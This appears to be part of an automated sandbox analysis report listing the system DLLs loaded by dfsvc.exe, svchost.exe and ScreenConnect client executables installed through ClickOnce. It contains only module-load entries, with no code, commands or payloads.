                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
